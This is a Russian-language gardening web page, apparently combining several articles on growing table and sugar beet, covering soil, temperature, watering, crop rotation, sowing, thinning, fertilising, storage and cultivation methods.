3 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Необходимые условия для выращивания свеклы

Технология выращивания столовой свеклы

Столовая свекла является одним из традиционных продуктов русской национальной кухни, а потому широко используется в домашней кулинарии. Хотя стоимость этого овоща в розничной сети совсем невелика, практически все огородники-любители стараются вырастить хотя бы немного свеклы на своем приусадебном участке. В целом этот овощ можно считать довольно простым в выращивании, но о некоторых особенностях ухода за ним всё же следует знать.

Ботаническое описание столовой свеклы

Для многих огородников может оказаться сюрпризом, но столовая свекла — это отнюдь не самостоятельный вид, а лишь разновидность вида «свекла обыкновенная». То есть и столовая, и сахарная, и кормовая свекла — это всё один и тот же вид растений, входящий в ботанический род Свёкла.

Свёкла всех разновидностей имеет стержневой, плотный, очень мясистый корнеплод, немного выступающий над поверхностью земли. Именно этот корнеплод и есть основной продуктом при искусственном выращивании свёклы столовой.

Являясь двулетним растением, в первый год свекла формирует крупный корень и несколько крупных листьев. На второй год (изредка к осени первого) из центра листовой розетки вырастает покрытый листьями прямостоячий стебель высотой от 50 до 125 см. В пазухах самых верхних листьев на этом стволе формируются мелкие бледные цветки, сгруппированные в сложные колосья. Перекрестное опыление выполняют мелкие насекомые. Впоследствии эти колоски превращаются в соплодия, содержащие небольшое количество семян сложной формы.

Что касается непосредственно сладкой столовой свеклы, то здесь нужно отметить лишь некоторые ее отличия от остальных разновидностей. Во-первых, столовая свекла отличается насыщенным бордовым цветом лиственных стеблей и корнеплода (в особенности мякоти и сока, поскольку наружная кожица у многих сортов бывает красно-коричневой или серо-коричневой). Во-вторых, средняя масса корнеплода относительно невелика и колеблется в пределах от 0,3 до 1 кг. В-третьих, у большинства сортов корнеплод имеет не стержневую (перевернутого конуса) форму, а шаровидно-уплощённую. Наконец, только столовая свекла используется в пищу человеком в исходном виде, поскольку обладает нежным сладковатым вкусом.

Характеристики почвы и температурные условия для выращивания столовой свеклы

Свекла предпочитает плодородные хорошо разрыхленные почвы с нейтральной кислотностью. Оптимально подходят для этой культуры классические черноземы, а также серые оподзоленные почвы. Кроме того, хороший урожай вполне можно вырастить и на тщательно окультуренных торфяниках низинного типа.

Свекла красная столовая является довольно холодостойким растением. Ее семена способны давать побеги даже при температуре около 4—5 °С. В таких температурных условиях всходы пробиваются на поверхность примерно через 22—23 дня. Но это вовсе не означает, что такие низкие температуры являются для нее предпочтительными. Если повысить температуру до 10 °С, прорастание наступает на 2—3 дня раньше, а при 25 °С и прочих равных условиях всходы можно наблюдать менее, чем через неделю — всего на пятый-шестой день. А вот повышение температуры сверх этого значения уже нежелательно, поскольку губительно воздействует на состояние семян и всходов.

В начальный период формирования растения (от появления всходов и до старта процессов корнеобразования) предпочтительной является умеренная температура на уровне 15—18 °С. В случае заморозков в этот период развития всходов происходит гибель значительной части посевов или даже всех побегов вообще.

После того, как молодой овощ столовая свекла сформирует четыре-шесть листочков, он становится гораздо более устойчивым к возможным похолоданиям. Но если заморозки окажутся длительными, это приведет к снижению темпов дальнейшего развития корнеплода и появлению значительно большего количества цветушных стеблей.

Помимо весенних заморозков следует внимательно относиться и к осенним, если урожай свеклы еще не убран. Кратковременное похолодание до 2—3 °С корнеплоды переживут относительно безболезненно, но если холода усилятся или затянутся, это скажется на состоянии всего растения крайне негативно. Особенно опасны продолжительные осенние заморозки для тех сортов столовой свеклы, у которых значительная часть корнеплода расположена над поверхностью грунта.

Оптимальный уровень влажности почвы и световой режим для столовой свеклы

Потребность в увлажнении почвы на грядке, где растет столовая свекла, определяется погодно-климатическими условиями и особенностями применяемой агротехники (например, использованием мульчи или ее отсутствием). Считается, что свекле требуется около 350 единиц почвенной влаги, чтобы сформировать одну единицу сухого массы корнеплода.

Очевидно, что бессмысленно рассчитывать на высокую урожайность столовой свеклы при дефиците воды в почве. Нехватка влаги крайне негативно сказывается на темпах роста корнеплода, особенно в условиях высокой летней температуры. В то же время избыточное содержание воды в почве, в том числе по причине близости грунтовых вод, отражается на состоянии посевов не менее негативно. В слишком сырой почве корнеплоды массово болею, а урожай получается весьма скудным.

Таким образом, в условиях нормального грунта и средней полосы столовую свеклу нужно регулярно поливать. Делать это нужно всякий раз, когда полностью высохнет верхний слой грунта. То есть примерно раз в месяц или даже чаще, расходуя на квадратный метр посевов около 20—30 литров воды. Однако за две-три недели до уборки столовой свеклы на хранение полив прекращают, чтобы повысить лежкость корнеплодов.

Столовая свекла относится к числу светолюбивых культур. Не смотря на то, что основной продукт — это корнеплод, растения нуждаются в свете на протяжении всего периода вегетации, а дефицит освещения снижает урожай на треть или даже больше. Кроме того, нехватка света сказывается на химическом составе корнеплодов.

Оптимальный световой режим для столовой свеклы — это 13—16 часов солнца в сутки. При сокращении светового дня до 10—11 часов растения резко замедляют темпы роста корнеплодов, формируя лишь надземную часть.

Ввиду этого, для посевов столовой свеклы нужно выбирать такие участки поля, которые открыты солнцу в течение всего дня. Если утром или вечером на грядки будет ложиться многочасовая густая тень от деревьев, сооружений или складок местности, хорошего урожая ждать не следует.

Место столовой свеклы в севообороте

Даже начинающим огородникам-любителям нет необходимости рассказывать о важности соблюдения правил севооборота. Без этого просто невозможно рассчитывать на более-менее хороший урожай.

В том, что касается предшественников для столовой сахарной свеклы, то на эту роль оптимально подходят все виды капусты, горох и фасоль, укроп, кориандр, пастернак и репчатый лук. Хорошими соседями по грядке для свеклы являются картофель, помидоры, репчатый лук, морковь, огурцы. Категорически нельзя сажать свеклу после шпината, петрушки, кукурузы, сельдерея, огурцов, картофеля и репы. Плохими соседями для столовой свеклы являются другие подвиды свеклы, а также капуста и томаты.

В свою очередь хорошим решением будет посадить после столовой свеклы горох, клубнику (садовую землянику), краснокочанную капусту, картофель, огурцы, сельдерей, укроп, чеснок, или шпинат. А вот что не нужно сажать после свеклы столовых сортов, так это репчатый лук и все виды капусты, кроме краснокочанной.

Посадка столовой свеклы

Перед тем, как сеять столовую свеклу, желательно обогатить почву удобрениями. Делают это еще с осени, внося под зяблевую вспашку около 40—60 т перегноя на гектар. Весной на бедных почвах во время предпосевной культивации также желательно удобрить поля азотом (60—90 кг/га), фосфором (90—120 кг/га) и калием (90—120 кг/га).

Если участок сильно засорен сорняками, также будет нелишним провести обработку поля почвенными гербицидами.

Столовую свеклу сеют в два этапа, используя калиброванные семена. Первый сев выполняется сразу после сева ранних зерновых, второй — во второй декаде мая. Свекла раннего сева созревает уже к середине лета и может быть использована в пищу незамедлительно, однако у нее очень плохая лежкость. Посеянная в мае свекла созревает только к осени, но зато может храниться всю зиму без каких-либо проблем.

Столовую свеклу сеют двумя способами — широкорядным (междурядье около 50 см), либо ленточным. Норма высева свеклы столовой составляет около 9 кг на гектар для одноростковых семян и около 13—14 — для многоростковых.

Семена свеклы заделывают на глубину трех-четырех сантиметров. В условиях приусадебного участка для этого удобнее всего использовать простые механические сеялки ручного типа, поскольку сеять свеклу вручную при масштабе более сотки становится весьма утомительно. После сева очень желательно выполнить прикатывание грядки.

Если посев получился слишком загущенным или на грядке образовалась плотная корка, также очень желательно провести боронование посевов. Для этих целей нужно использовать легкие бороны и выполнять процедуру строго поперек рядов. Боронование способно проредить посевы на 16—17% и уничтожить молодые сорняки.

Уход за посевами столовой свеклы

В начале уже было сказано о зависимости между температурой и сроком появления всходов. На практике же при соблюдении элементарных правил агротехники семена столовой свеклы дают массовые всходы уже на вторую неделю после сева.

После того, как побеги дадут два первых настоящих листочка, нужно проредить посевы, чтобы между растениями было в среднем около 3—4 см. Спустя несколько недель, когда диаметр корнеплодов большинства растений достигнет 3 см, нужно провести повторное прореживание, чтобы в ряду было не более 15 растений на один погонный метр.

Если этого не сделать, слишком загущенная грядка даст много мелких корнеплодов нетоварного вида. Произойдет это как по причине дефицита свободного места для формирования крупных корнеплодов, так и по причине нехватки питательных веществ в почве на все растения.

На протяжении всего периода вегетации нужно проводить полив хотя бы раз в месяц и выполнять междурядное рыхление почвы для обеспечения нормального газообмена между почвой и атмосферным воздухом. При необходимости можно выполнять подкормку растений удобрениями.

Уборку столовой свеклы майского посева нужно провести до наступления первых серьезных заморозков, так как подвергшиеся влиянию низких температур корнеплоды не только теряют часть своих вкусовых качеств, но и значительно хуже хранятся.

Во время сбора может оказаться, что некоторое количество корнеплодов еще очень мелкие и недозревшие. Если извлекать их из земли с предельной осторожностью, стараясь не повредить мелкие всасывающие корешки и ботву, то такие корнеплоды можно дорастить до товарного вида в теплице.

Хранение столовой свеклы

Вырастить столовую свеклу — это лишь половина дела, ее еще нужно уметь сохранить, чтобы все труды не пропали зря.

Извлеченные из земли корнеплоды рекомендуется на несколько дней оставить сохнуть на грядке, если позволяет погода. Землю счищать нужно аккуратно, стараясь не повредить кожицу. При этом ни в коем случае нельзя мыть корнеплоды водой. Ботву нужно аккуратно обрезать ножницами, секатором или ножом, оставив сантиметровые «пеньки». Если же обрывать листья руками, то в месте стыка листьев с корнеплодами образуется место повреждения, которое потом превратиться очаг гниения.

Подсушенную и очищенную от земли и листьев свеклу хранят в подвале или погребе с влажностью не более 90% и температурой около 2 градусов выше нуля. Если температура и влажность будут выше, лежкость корнеплодов резко снизится.

В остальном же хранение столовой свеклы происходит аналогично прочим корнеплодам. Предпочтительнее всего использовать ящики или деревянные закрома, поскольку на голом полу овощи будут быстрее портиться.

Допускается хранение свеклы верхним слоем на картофеле. В этом случае свекла будет поглощать лишнюю влагу, которая вредна картошке, но не вредит самой свекле.

Как и где выращивают сахарную свеклу

Большинство огородников считают что выращивание сахарной свеклы производиться только в производственных масштабах для получения сахара, но данный вид свеклы имеет и много питательных элементов и довольно часто применяется для кормления скотины. Районы выращивания сахарной свеклы могут быть любыми, она растет повсеместно. В данной статье мы узнаем где выращивается сахарная свекла и условия для ее выращивания.

Выращивание сахарной свеклы

Данная культура может заинтересовать фермеров, так как при соблюдении технологии посадки и возделывания можно получать огромные урожаи из года в год. Выращивание сахарной свеклы практически не отличается от посадок обычной столовой свеклы. Для посадки нужно выбирать участок с подходящим грунтом, произвести своевременный посев, полив и подкормки.

Ценность данной культуры зависит не только от вкусовых качеств плодов, но и от сахаристости. Сахаристость можно проверить в лабораторных условиях при химическом исследовании мякоти плода. Чем выше показатель, тем больше сахара можно из нее переработать.

В соответствии с сахаристостью сорта и показателями урожайности ее можно подразделить на следующие группы:

  1. Сорта которые относятся к урожайной группе, охарактеризованные большим количеством плодов со средним или малым содержанием сахара.
  2. Урожайно — сахаристая. Данная группа наиболее востребована, сорта имеют хорошую урожайность и большое содержание сахара.
  3. Сахаристая группа включает сорта, которые имеют большое содержание сахара, но урожайность немного низкая, по сравнению с предыдущими группами.

На Российских полях наиболее распространены следующие виды сортов сахарной свеклы:

  1. Северокавказская односеменная
  2. Рамонская односеменная
  3. Льговский МС 29

Данные сорта имеют высокие показатели урожайности и сахаристости.

Подходящие условия для выращивания сахарной свеклы

Для получения хорошего урожая нужно выбирать участок земли, который наиболее подойдет для сахарной свеклы. Для этого хорошо подойдут суглинистые или супесчаные легкие грунты, в нейтральной кислотностью. На тяжелых и сырых грунтах достойный урожай сложно вырастить.

Решающим значением для посадок являются предшественники, таким образом нельзя сажать после:

  1. Многолетних бобовых культур
  2. Злаковых трав
  3. Кукурузы
  4. Рапса
  5. Льна
  6. Зерновых культур (если при выращивании применяли гербициды)

Обратите внимание: Лучше всего выращивать культуру после озимых зерновых, предшественниками которых были зернобобовые или клевер первого года. На одном и томже месте свеклу сажают раз в три года.

Сажаем сахарную свеклу: технология выращивания

Для посадки почва может подготавливаться как весной, так и осенью. При осенней подготовке почва удобряется азотными, фосфорными и калийными удобрениями, после чего грунт нужно перекопать на 30 сантиметров в глубину. Весной проводят боронение и культивацию на глубину в 8 сантиметров.

Когда земля нагреется до +6 градусов на глубине в 5 сантиметров а температура воздуха достигнет +8 градусов, то можно приступать к посадке семян. Посев семян производиться в ясный день, непосредственно после подготовки почвы.

Весь процесс посадки свеклы выглядит следующим образом:

  • Семена сеют на глубину 2-5 сантиметров, между рядами оставляют по 45 сантиметров
  • На пятый день после посева производиться довсходное боронение, чтобы разбить корку после прошедших дождей, убрать сорняки и увеличить запасы влаги.
  • После появления первых побегов производиться прореживание посадок, при этом оставляются сильные ростки.
  • Данной культуре необходим обильный и своевременный полив до 25 м3/1 га в начале вегетативного периода и до 40 м3/1 га во время бурного роста ботвы. В июле и августе свеклу поливают четыре раза в месяц при малом количестве осадков, а в сентябре достаточного одного полива перед уборкой.
  • Совместно с поливами вносятся калийно-фосфорные подкормки, при необходимости с добавлением азота, с которым нельзя перебарщивать, так как корнеплоды накапливают нитраты.
  • Обязательное междурядное рыхление и уничтожение сорняков.
  • Профилактические обработки против болезней и вредителей при помощи биопрепаратов и инсектицидов.

Сахарную свеклу посадили, теперь ее нужно убрать

К уборке приступают в конце сентября. При промышленных масштабах применяется механизированная уборка при помощи комбайнов. Если же участок небольшой то по силам ее убрать в ручную, подкапывая корнеплоды вилами.

Обратите внимание: Важно при уборке не повредить корнеплоды, в противном случае ее нельзя будет хранить.

Выкопанный урожай подсушивается на солнце, очищается от земли и подготавливается к закладке на длительное хранение, в случае использования для кормления скота. Или же занимаются реализацией урожая, если свекла выращивалась на продажу.

Видео: Свекла сахарная

Выращивание свеклы: секреты опытных огородников

Чтобы вырастить столовую свеклу сладкой и здоровой, пригодной к длительному хранению, надо знать тонкости агротехники этого овоща. Тому, кто освоит эту науку, на всю зиму гарантировано разнообразное витаминное меню.

Выбор сортов и семян

Свекла неприхотлива и готова расти во всех широтах, за исключением разве что вечной мерзлоты. Можно остановить свой выбор на районированных местных сортах или экспериментировать с новыми гибридами с повышенной выносливостью.

Срок созревания свеклы зависит от сорта и составляет от 80 до 130 дней. Корректировать время созревания можно сажая свёклу под парник или рассадой, проращивая предварительно семена.

Наиболее популярные сорта, пригодные для выращивания в любых климатических условиях:

Валента – раннеспелый сорт со сладкой, тёмно-красной мякотью, холодоустойчивый, лёжкий, устойчивый к болезням.

Атаман – среднепоздний сорт, плоды цилиндрические весом 300 г. бордовые, сладкие с однородной мякотью, очень хорошо хранится.

Цилиндра – среднепоздний сорт с вытянутым ярко-красным плодом, вес которого достигает 500 г., крепким иммунитетом и хорошей лёжкостью.

Подзимняя – среднеранний холодостойкий сорт, устойчивый к большинству болезней, плоды округлые весом 200 – 400 г. с бордовой мякотью.

Красный богатырь – среднеранний высокоурожайный сорт, плоды цилиндрические тёмно-красные с тонкой кожицей и однородной мякотью весом 200–550 г.

Красный лёд – среднеранний сорт, плоды ярко-красные, со структурной мякотью, вес небольшой — 200–300 г., хорошо хранится.

Бикорес – среднеспелый высокоурожайный сорт, плоды ярко-красные весом 200-350 г., лёжкий.

Если вы планируете всесезонно питаться свеклой со своего огорода, то надо производить посадку как ранних, так и поздних сортов свеклы.

Сроки посадки

Чаще свеклу сажают весной, когда воздух прогреется до 15-18 С. Можно сделать это и немного раньше, в апреле высадив не пророщенные семена под парник.

Если весна слишком холодная, можно сдвинуть срок посадки на более позднее время, выбрав при этом свеклу раннего срока созревания.

Озимую свёклу высевают сухими семенами до наступления заморозков. Выбирают для этого только специально ориентированные сорта. Места посевов укрывают. Они пускаются в рост ранней весной и обеспечивают летний урожай свеклы. Вызревшие летом корнеплоды длительному хранению не подлежат.

Готовим почву под свеклу

Почву перекапывают с осени после тщательной уборки предыдущего урожая. Органические составляющие (компост или навоз) вносят максимально глубоко – на 30-35 сантиметров. Можно организовать некоторое подобие тёплой грядки, но с тонким слоем органики, чтобы она успела разложиться к тому моменту, когда корень свеклы до неё дорастёт.

Кислотность земли понижают, рассыпая доломитовую муку, перетёртую яичную скорлупу или древесную золу.

Минеральные добавки – суперфосфат и сульфат калия – лучше вносить с осени, чтобы они успели раствориться в почве. Их рассыпают в сухом виде по грядке перед перекопкой из расчёта не более 0,3 кг. на один квадратный метр земли.

Корнеплод лучше развивается в рыхлом грунте. Весной грядку хорошо повторно перекопать и замульчировать торфом или перепревшими древесными опилками.

Выбор места, севооборот

Правила, по которым выбирают место для свеклы:

  1. свекла любит пространство, чем реже высажены друг от друга корнеплоды, тем больше у них места для наращивания округлых бочков;
  2. если нет нужды в больших плантациях этого корнеплода, высадить свеклу можно бордюрным способом по картофелю, огурцам, фасоли, рядом с зеленью или луком;
  3. свекла нуждается в частом орошении, но застой воды приведёт к загниванию, значит грядку надо разбивать рядом с источником полива на хорошо дренированном участке;
  4. дважды подряд на одно место свеклу не сажают, соблюдают севооборот очень тщательно;
  5. предшествующие растения для этого овоща – лук, чеснок, картофель, томаты, баклажаны, морковь, кабачки;
  6. нежелательно высаживать свеклу после капусты и второй год подряд на одном месте.

Если приходится потеснить в огороде какие-либо культуры, высадив их на бедную почву, то это можно смело сделать со свеклой. Обеспечить ей рост можно хорошим разрыхлением грунта, своевременным поливом и удобрением.

Подготовка семян

Семена свеклы перед посадкой:

  • проверяют на всхожесть – высыпают в стакан с солёной водой, перемешивают и удаляют всплывшие;
  • закаливают чередованием горячей воды и холода, выдерживая в каждом температурном режиме по несколько часов;
  • обеззараживают, выдерживая 12 часов в слабом растворе марганцовки;
  • стимулируют замачиванием в стимуляторе роста.
  • проращивают, если семена готовятся на выращивание свекольной рассады.

Для подзимней посадки нужно ограничиться только проверкой на всхожесть и обеззараживанием – не в меру разбухшие семена могут прорасти в зиму и погибнуть.

Посадка свеклы в открытый грунт

Семена свеклы крупные по сравнению с большинством садовых культур. Посев особого труда не составит.

Высевают свеклу в бороздки глубиной 3-5 сантиметров с расстоянием друг от друга в 5 сантиметров и между рядками – 20 сантиметров.

Озимые посевы заглубляют на 10 сантиметров, чтобы семена не погибли.

При высаживании свеклы в открытый грунт рассадой, интервал устанавливается не менее 20 сантиметров.

Уход за свеклой

Процесс выращивания свеклы включает в себя поливы, подкормки, рыхления и обязательное прореживание.

Свекла вовсе не требует пристального внимания, если она растёт на хорошей почве и при должном поливе. Но если растению будет не хватать питания, это плохо скажется на вкусовых качествах или приведёт к заболеваниям.

  1. Фомоз плодов и листьев свеклы развивается при недостатке бора и выражается в появлении на листве осветлённых пятен, также он чреват искривлением и появлением полостей в корнеплоде.
  2. Церкоспорозом грозит чрезмерная влажности на грядках.
  3. Избыток азота в почве приведёт к горьковатому землистому вкусу свеклы.

Поливы и подкормки

После прорастания поливать свеклу нужно часто – один раз в два-три дня, чередуя полив с неглубоким рыхлением, чтобы не повредить корешки. Окучивать этот корнеплод не нужно. Но хорошо между рядками свеклы сформировать боровок, по которому будет проливаться вода. В случае размывания почвы, сверху досыпают тонкий слой перегноя.

Рыхление можно заменить мульчированием. Слой измельчённой высушенной травы, выложенный между рядами, поможет сберечь влагу.

Единовременного внесения минеральных удобрений перед посадкой для свеклы достаточно. Проводить дополнительные подкормки имеет смысл, только если растения заметно отстают в росте.

В качестве предупреждающих подкормок годится периодический полив свеклы разведёнными травяными настоями или дрожжевыми удобрениями.

Два-три раза за сезон можно поливать свеклу подсоленной водой из расчёта одна столовая ложка на 10 литров воды. Или использовать комплексные удобрения по инструкции, например, Макбор.

Корнеплоды активнее, чем другие культуры, накапливают нитраты. При выращивании свеклы лучше остановить свой выбор на натуральных удобрениях.

Оптимальная густота посадок

Важный момент в уходе за свеклой – прореживание. Оно проводится в несколько этапов, чтобы хозяин имел возможность оценить подрастающие корешки и выбрать лучшие из них. Перед каждым прореживанием необходимо хорошо заливать свеклу.

Когда появляется первая пара листочков, убирают самые слабые растения. В дальнейшем при прореживании удаляют больные экземпляры, слишком загущённые хорошие корешки можно пересадить на новое место или использовать в пищу в качестве зелени.

От первоначального расстояния между растениями в 5 сантиметров в итоге надо выйти на интервал в 15-20 сантиметров.

Сбор и хранение урожая

Убирают свеклу осенью до наступления холодов, когда листья на растении завянут. При сборе урожая действовать надо аккуратно, поддевая лопатой большие пласты земли и вынимая корнеплоды по одному.

Землю аккуратно отряхивают с плода, а оставшийся венчик листьев лучше не обрезать – просто убрать завявшие стебли.

Хранят корнеплоды среднего размера с целостной кожицей в сухом помещении при температуре от 2 до 5 С.

Болезни и вредители свеклы

Главные вредители любых корнеплодов – кроты, медведка и грызуны. Опасны также свекловичные блошки, проволочник и слизни. Кроме того, растения поражаются различными гнилями, нематодой.

Бороться с этими бедами следует в первую очередь соблюдением гигиены приусадебного участка – качественной уборкой, тщательным глубоким перекапыванием и профилактической обработкой посадок естественными обеззараживающими препаратами – древесной золой, табачной пылью, порошком жгучего перца.

Эти корнеплоды славятся неприхотливостью и постоянством. Они хорошо хранятся в подвалах и овощных ямах, сберегая полезные вещества до самой весны. Обязательно найдите место на своём участке для свеклы.

Создаем оптимальные условия для выращивания свеклы: рекомендации, которые работают!

Выращивание свеклы испокон веков входит в обязательную «культурную» программу русского огорода. При соблюдении простых правил агротехники неприхотливый овощ обеспечит вкусными и полезными корнеплодами на летне-осенний сезон и продолжительную русскую зиму. А если к базовой технологии подойти творчески, использовать современные сорта и препараты, эффективные технологии посадки и ухода, свекла сумеет удивить урожаем даже опытных огородников.

Вкусный корнеплод – один из основных овощей русской кухни

Базовые требования к возделыванию свеклы

Лучше всего выращивание свеклы удается в открытом грунте – в весенней или летней культуре. Независимо от сроков посадки существуют общие агротехнические правила, направленные на создание таких условий, при которых растение полностью раскрывает свой потенциал.

Выбор места, севооборот

Столовые корнеплоды восприимчивы к солнечному свету. Свекла, расположенная в тени, нарастит роскошную ботву в ущерб продуктовому органу. Для нее подойдет хорошо освещенное место на отдельном участке или по границам гряд других овощей. Важное условие агротехники – широкие междурядья, обеспечивающие доступ солнца.

В севообороте ей предшествуют культуры, продукцией которых является вегетативная масса – огурец, капуста, томат, салат. Внесенный под них годом ранее соломистый навоз за это время перегниет и будет отличной органической основой для корнеплодов.

Структура и состав почвы

Для выращивания свеклы подходят хорошо структурированные супесчаные, суглинистые, черноземные, торфяные почвы. Они должны быть рыхлые, питательные, воздухопроницаемые, способные удерживать влагу. По кислотности – нейтральные или слабощелочные (рН не ниже 6–6,5). Не любит культура плотные глинистые грунты, ее нельзя сажать в низинах с близким залеганием грунтовых вод.

Легкость, воздухопроницаемость почвы поддерживают с помощью рыхления. Сразу по всходам проводят мелкое рыхление, чтобы не задеть сеянцы. Все последующие обработки – более глубокие, чтобы обеспечить доступ кислорода к корнеобитаемому слою.

Секрет 1.Свекла – неплохой индикатор для определения кислотности. О нейтральной и щелочной реакции почвенного раствора говорит зеленая ботва. И наоборот, чем сильнее краснеют листья овоща, тем кислее почва.

Отношение к теплу

Культура достаточно теплолюбива. Всходы способны выдержать понижение температуры не более чем до 1–2⁰мороза, поэтому ранние посевы нецелесообразны. Как определить оптимальные сроки и вырастить свеклу в открытом грунте для раннего потребления и хранения?

Весенний посев проводят в первой декаде мая, когда почва прогреется до 8–10⁰тепла. В таких условиях семена прорастут за неделю, а при температуре воздуха 16–18⁰С растения быстро поднимутся, начнут завязывать корнеплод. Летом свеклу сеют не позже середины июня, чтобы успеть убрать урожай до заморозков.

Требования к питанию

Свекла – один из самых требовательных к питанию корнеплодов. Чтобы получить высокий и качественный урожай необходимо соблюдать режим внесения удобрений.

  • Под осеннюю перекопку кладут полное удобрение, содержащее фосфор, калий, азот, например, нитрофоску (100г/м²). Хороший эффект получается от сочетания минеральных соединений с органикой – перегноем, компостом.
  • Следует помнить, что удобрения, запаханные на глубину 20–30 см, не смогут дать питание семени и проростку вначале вегетации. Поэтому при посеве в рядки вносят гранулированный суперфосфат (до 10 г/м²). Благодаря фосфору происходит усиленное нарастание корневой системы, более глубокое проникновение корневых волосков в почву.
  • Важную роль в развитии головки свеклы играет бор. Он необходим для усвоения других макроэлементов, стимулирует углеводный обмен, улучшает накопление сахаров, служит для профилактики гнили сердечка. Вносят бор в составе корневых подкормок дважды – после второго прореживания и за 1,5 месяца до уборки.

Секрет 2. Подкормки на 20-й и 40-й день после всходов раствором сбалансированных удобрений для корнеплодов типа Агрикола, Бона Форте, Фертика обеспечат растения необходимыми макро- и микроэлементами. Чтобы повысить сахаристость корнеплодов, за месяц до уборки полейте их раствором Маг-Бора.

Оптимальная густота посадок

Одна из особенностей выращивания свеклы – троекратное прореживание всходов. Даже при использовании методов точного сева прорывки не избежать, так как из одного соплодия вырастает несколько ростков. Когда и как прореживать?

  • Как только появились семядольные листики, аккуратно удаляют слабые сеянцы, оставляя растения на расстоянии 1–2 см.
  • Вторую прорывку проводят в фазе 4–5 настоящих листьев. В этот период уже можно определить потенциал растений, выбрав более крепкие и здоровые экземпляры. Интервал в ряду – 6–8 см.
  • Третье прореживание определяет окончательную густоту посевов.

Секрет 3. Свекла – довольно «управляемый» овощ. Она наращивает головку в пределах отведенного для этого места. Если вы любите крупные корнеплоды, оставляйте между растениями 15–20 см. Чтобы получит выровненные стандартные головки не более 10 см в диаметре, достаточно 10–12 см.

Особенности полива

Свекла нуждается в большом количестве влаги во время прорастания семян и укоренения всходов. Второй критический период – начало формирования корнеплода. С конца мая и весь июнь практикуют еженедельный полив из расчета 1,5–2 ведра воды на квадратный метр.

После того как корневая система сформирована, а у корнеплодов она достигает 2–2,5 м, растение способно добывать влагу из нижних слоев почвы. В этот период поливают нечасто, но обильно, чтобы промочить землю на глубину не менее 20–30 см – к активной корневой зоне.

Возьмите за правило рыхлить междурядья, как только они подсохнут после полива или дождя. Не менее эффективный вариант сохранения влаги – мульчирование поверхности почвы.

Секрет 4. Слой мульчи в 5–7 см избавит вас от трудоемких процессов рыхления, борьбы с сорняками, существенно сократит потребность в поливе.

Способы посадки свеклы

Руководствуясь базовыми агротехническими правилами, примеряя те или иные приемы к особенностям местности, огородники создают свои авторские технологии выращивания столовой свеклы. Рассмотрим наиболее интересный опыт.

Традиционный, с элементами интенсификации

Участок под посадку готовят с осени – перекапывают, удобряют, при необходимости понижают кислотность древесной золой (1 кг/м²). Весной грядку разравнивают, небольшое количество аммиачной селитры и суперфосфата вносят в посевной рядок.

  • строчный с междурядным интервалом 20–25 см;
  • в широкие борозды (8–10 см), размещенные через 17–22 см;
  • лентами, объединяющими по 2–3 ряда, с проходом не менее 45 см.

Дно посевной борозды уплотняют и обильно поливают, раскладывают семена, присыпают сухим питательным субстратом слоем в 2–3 см. При таком подходе соплодия падают на один уровень, хорошо напитываются влагой, всходят одновременно.

Существуют приемы, упрощающие уход за растениями. Это применение одноростковых сортов, посев на ленте, мульчирование почвы органикой или укрывными материалами (агроволокном, лутрасилом).

На теплых грядках

В регионах с тяжелыми почвами, неблагоприятными погодными условиями прибегают к способу выращивания свеклы на теплых органических грядках. Питательная заправка гряды позволяет структурировать и обогатить почву, успешно культивировать овощ без применения химических удобрений. Тепло же, выделяемое в процессе разложения органики, положительно сказывается на развитии проростков.

Состоит такая грядка из нескольких слоев растительного происхождения по принципу – внизу самые крупные фрагменты, с длительным периодом разложения, вверху почти перепревшие, обогащенные биогумусом. В зависимости от уровня расположения грунтовых вод, готовят органические грядки двух видов.

  • Заглубленные. Основной «пирог» находится в траншее глубиной 50–60 см. Над поверхностью земли выступает бортик высотой 10–15 см.
  • Приподнятые. Грядка находится над поверхностью, в коробе высотой до 60 см.

Легкая воздушная структура субстрата идеально подходит для развития корнеплода. Он получается крупным, ровным, сладким. Применение мульчирующего слоя избавляет от рыхления, сдерживает рост сорняков. Полив нужен более частый и интенсивный – для непрерывного разложения органики.

Существенное преимущество – получение экологически чистого продукта.

На узких грядках (почти по Митллайдеру)

Узкие грядки пришли в российское овощеводство с технологией Митллайдера и ориентированы на интенсивное применение химических удобрений. Эта особенность подходит для выращивания свеклы. Широкие междурядья обеспечивают обилие света, сбалансированные минеральные подкормки способствуют нарастанию продуктового органа. Под воздействием солнца происходит усвоение полезных и нейтрализация вредных химических соединений, например, нитратов.

При стандартной ширине грядки 45 см сеют свеклу в 2 ряда, минимальный проход – 60 см. Свободный доступ со всех сторон облегчает уход, не приходится топтаться в междурядьях.

Корневые подкормки делают при второй и третьей прорывке, внося на 1 м ² по 30–50 г сульфата аммония и 100 г золы.

В смешанных посадках

Свекла в огороде занимает, как правило, незначительную площадь. Поэтому ее часто сажают не в чистом виде, а качестве уплотняющей культуры. Как вырастить полноценную свеклу в смешанных посадках, секретами делятся огородники с «дизайнерским уклоном».

  • Корнеплод нужно сажать по краю гряд, чтобы он получал достаточно света.
  • Подбирать комбинации овощей, сочетающихся между собой по режиму полива. Для свеклы хорошие соседи – лук, картофель, фасоль, капуста, укроп, редис.
  • Совмещать культуры с разными видами корневой системы – глубокой и поверхностной, чтобы они получали питание и воду из разных слоев почвы.

На небольших дачных участках мультиовощные грядки, дополненные цветами, выполняют декоративную функцию.

Рассадный способ

К выращиванию рассады свеклы прибегают, если нет другой возможности получить раннюю продукцию. Этот способ актуален для регионов с затяжной холодной весной и коротким летом. Вырастить рассаду можно в ящиках или индивидуальных контейнерах в комнате, теплице, парнике. Высевают семена во второй половине апреля, рассаживают после образования у растений 5–6 настоящих листьев. Саженцы за неделю до посадки выносят на улицу, постепенно приучая их к дневному свету. После высадки до укоренения накрывают лутрасилом – во избежание солнечных ожогов.

Преимущества рассадного способа:

  • получение пучковой продукции через месяц после высадки рассады;
  • равномерное распределение растений на грядке;
  • освобождение от прореживания;
  • экономия семян.

На капельном орошении

Одна из самых распространенных ошибок в выращивании корнеплодов – поверхностный полив. Влага, не достигающая корнеобитаемого слоя, быстро испаряется, не принося пользы. Вот почему на смену поливу из шланга приходит капельное орошение, способное минимальным количеством воды промочить землю на большую глубину.

Свеклу под капельное орошение высевают широкими бороздами, на каждой размещают поливной трубопровод. Чтобы получить быстрые и дружные всходы, достаточно увлажнять 10-сантиметровый слой. При формировании корнеплодов глубину орошения увеличивают до 50 см. Этим же способом проводят подкормки, подавая питание непосредственно в корневую зону.

Свекла: выращивание в открытом грунте

Свекла – полезный овощ, выращивается и используется для приготовления различных блюд и применяют в медицине.

